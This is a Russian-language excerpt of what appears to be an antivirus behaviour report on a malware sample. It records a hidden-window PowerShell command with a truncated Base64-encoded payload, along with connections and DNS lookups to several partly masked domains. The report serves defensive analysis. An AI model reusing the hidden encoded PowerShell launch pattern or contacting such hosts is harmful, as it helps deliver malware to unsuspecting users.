Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABWAG4AawBrAHAAYQBkAHMAbAByAHEAZwA9ACcATgBmAHgAcQB2AG0AYQBmAHMAZgB1AGcAJwA7ACQAQwBjAHIAZgBjAGoAdAB5AG8AaABhAGgAYgAgAD0AIAAnADEAMAA1ACcAOwAkAEkAZgB0AGMAcQB2AG8AaAA9ACcAVwB5AGsAZwB...
- 'ma####r.paskr.com':443
- 'in######.farmaciaartesanal.com':443
- 'ol###ehls.com':443
- 'he##.paskr.com':443
- DNS ASK in######.farmaciaartesanal.com
- DNS ASK ol###ehls.com
- DNS ASK de####p.paskr.com
- DNS ASK he##.paskr.com
- DNS ASK ma####r.paskr.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABWAG4AawBrAHAAYQBkAHMAbAByAHEAZwA9ACcATgBmAHgAcQB2AG0AYQBmAHMAZgB1AGcAJwA7ACQAQwBjAHIAZgBjAGoAdAB5AG8AaABhAGgAYgAgAD0AIAAnADEAMAA1ACcAOwAkAEkAZgB0AGMAcQB2AG8AaAA9ACcAVwB5AGsAZwB...' (со скрытым окном)